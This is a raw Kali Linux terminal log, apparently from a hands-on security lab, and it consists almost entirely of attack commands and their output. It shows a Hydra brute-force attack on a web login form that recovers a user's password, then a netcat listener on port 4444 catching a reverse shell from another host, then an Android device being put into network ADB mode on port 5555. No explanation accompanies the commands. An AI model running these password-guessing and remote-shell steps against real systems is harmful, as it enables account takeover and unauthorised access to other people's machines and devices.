      BRUTE FORCE ATTACK

                                                                                            
┌──(kali㉿kali)-[~]
└─$ cd Downloads
                                                                                                  
┌──(kali㉿kali)-[~/Downloads]
└─$ ls
'cacert(1).der'   cacert.der
                                                                                                  
┌──(kali㉿kali)-[~/Downloads]
└─$ cd ..       
                                                                                                  
┌──(kali㉿kali)-[~]
└─$ cd Download 
cd: no such file or directory: Download
                                                                                                  
┌──(kali㉿kali)-[~]
└─$ cd Downloads
                                                                                                  
┌──(kali㉿kali)-[~/Downloads]
└─$ ls
 10-million-password-list-top-1000  'cacert(1).der'   cacert.der
                                                                                                  
┌──(kali㉿kali)-[~/Downloads]
└─$ hydra -l mamu -P 10-million-password-list-top-1000 10.1.63.6 http-post-form "/login.php:username=^USER^&password=^PASS^:Incorrect Password" -s 8080
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-20 09:36:56
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000 login tries (l:1/p:1000), ~63 tries per task
[DATA] attacking http-post-form://10.1.63.6:8080/login.php:username=^USER^&password=^PASS^:Incorrect Password
[8080][http-post-form] host: 10.1.63.6   login: mamu   password: pearljam
1 of 1 target successfully completed, 1 valid password found                                                                                                           
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-20 09:37:14                                                                                     
                                                                                                 
***************************************************************************************************************************************************************************************************************************

21/3/2025

┌──(kali㉿kali)-[~]
└─$ id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),107(bluetooth),115(scanner),127(lpadmin),135(wireshark),137(kaboxer)
                                                                                                                                                                      
┌──(kali㉿kali)-[~]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.1.32.225  netmask 255.0.0.0  broadcast 10.255.255.255
        inet6 fe80::efe8:dafb:84bb:dc44  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:ea:68:79  txqueuelen 1000  (Ethernet)
        RX packets 230951  bytes 29775261 (28.3 MiB)
        RX errors 0  dropped 6712  overruns 0  frame 0
        TX packets 3943  bytes 1250066 (1.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 26  bytes 1580 (1.5 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 26  bytes 1580 (1.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

                                                                                                                                                                      
┌──(kali㉿kali)-[~]
└─$ nc -lvp 4444
listening on [any] 4444 ...
10.1.118.39: inverse host lookup failed: Unknown host
connect to [10.1.32.225] from (UNKNOWN) [10.1.118.39] 38250
Linux kali 6.12.13-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.12.13-1kali1 (2025-02-11) x86_64 GNU/Linux
 08:08:15 up  1:07,  2 users,  load average: 0.40, 0.31, 0.37
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
kali              -                06:50   26:44   0.00s  0.03s lightdm --session-child 13 24
kali              -                06:50   26:44   0.00s  0.53s /usr/lib/systemd/systemd --user
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),107(bluetooth),115(scanner),127(lpadmin),135(wireshark),137(kaboxer)
/bin/sh: 0: can't access tty; job control turned off
$                                                                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 


─(kali㉿kali)-[~]
└─$ sudo apt install adb      
[sudo] password for kali: 
Installing:                     
  adb
                                                                                                                                                                       
Installing dependencies:
  android-libbase  android-libboringssl  android-libcutils  android-liblog  android-libziparchive  android-sdk-platform-tools-common
                                                                                                                                                                       
Summary:
  Upgrading: 0, Installing: 7, Removing: 0, Not Upgrading: 1529
  Download size: 1,191 kB
  Space needed: 3,780 kB / 63.1 GB available

Continue? [Y/n] y
Get:1 http://kali.download/kali kali-rolling/main amd64 android-liblog amd64 1:34.0.5-6 [39.8 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 android-libbase amd64 1:34.0.5-6 [103 kB]
Get:5 http://kali.download/kali kali-rolling/main amd64 android-libziparchive amd64 1:34.0.5-6 [49.9 kB]
Get:6 http://kali.download/kali kali-rolling/main amd64 adb amd64 1:34.0.5-6 [276 kB]             
Get:7 http://http.kali.org/kali kali-rolling/main amd64 android-sdk-platform-tools-common all 28.0.2+10+nmu1 [12.3 kB]
Get:4 http://mirror.ourhost.az/kali kali-rolling/main amd64 android-libcutils amd64 1:34.0.5-6 [40.4 kB]       
Get:3 http://http.kali.org/kali kali-rolling/main amd64 android-libboringssl amd64 14.0.0+r45-1 [670 kB]
Fetched 1,191 kB in 2s (547 kB/s)                   
Selecting previously unselected package android-liblog:amd64.
(Reading database ... 401462 files and directories currently installed.)
Preparing to unpack .../0-android-liblog_1%3a34.0.5-6_amd64.deb ...
Unpacking android-liblog:amd64 (1:34.0.5-6) ...
Selecting previously unselected package android-libbase:amd64.
Preparing to unpack .../1-android-libbase_1%3a34.0.5-6_amd64.deb ...
Unpacking android-libbase:amd64 (1:34.0.5-6) ...
Selecting previously unselected package android-libboringssl:amd64.
Preparing to unpack .../2-android-libboringssl_14.0.0+r45-1_amd64.deb ...
Unpacking android-libboringssl:amd64 (14.0.0+r45-1) ...
Selecting previously unselected package android-libcutils:amd64.
Preparing to unpack .../3-android-libcutils_1%3a34.0.5-6_amd64.deb ...
Unpacking android-libcutils:amd64 (1:34.0.5-6) ...
Selecting previously unselected package android-libziparchive:amd64.
Preparing to unpack .../4-android-libziparchive_1%3a34.0.5-6_amd64.deb ...
Unpacking android-libziparchive:amd64 (1:34.0.5-6) ...
Selecting previously unselected package adb.
Preparing to unpack .../5-adb_1%3a34.0.5-6_amd64.deb ...
Unpacking adb (1:34.0.5-6) ...
Selecting previously unselected package android-sdk-platform-tools-common.
Preparing to unpack .../6-android-sdk-platform-tools-common_28.0.2+10+nmu1_all.deb ...
Unpacking android-sdk-platform-tools-common (28.0.2+10+nmu1) ...
Setting up android-sdk-platform-tools-common (28.0.2+10+nmu1) ...
Setting up android-liblog:amd64 (1:34.0.5-6) ...
Setting up android-libboringssl:amd64 (14.0.0+r45-1) ...
Setting up android-libbase:amd64 (1:34.0.5-6) ...
Setting up android-libziparchive:amd64 (1:34.0.5-6) ...
Setting up android-libcutils:amd64 (1:34.0.5-6) ...
Setting up adb (1:34.0.5-6) ...
Processing triggers for libc-bin (2.40-3) ...
Processing triggers for man-db (2.13.0-1) ...
Processing triggers for kali-menu (2024.4.0) ...
                                                                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ 
┌──(kali㉿kali)-[~]
└─$ adb devices
* daemon not running; starting now at tcp:5037
* daemon started successfully
List of devices attached
10609313B8115131        unauthorized

                                                                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ adb devices
List of devices attached
10609313B8115131        unauthorized

                                                                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ adb tcpip 5555
error: device unauthorized.
This adb server's $ADB_VENDOR_KEYS is not set
Try 'adb kill-server' if that seems wrong.
Otherwise check for a confirmation dialog on your device.
                                                                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ adb kill-server
                                                                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ adb tcpip 5555 
* daemon not running; starting now at tcp:5037
* daemon started successfully
error: device still authorizing
                                                                                                                                                                       
┌──(kali㉿kali)-[~]
└─$ adb tcpip 5555
restarting in TCP mode port: 5555

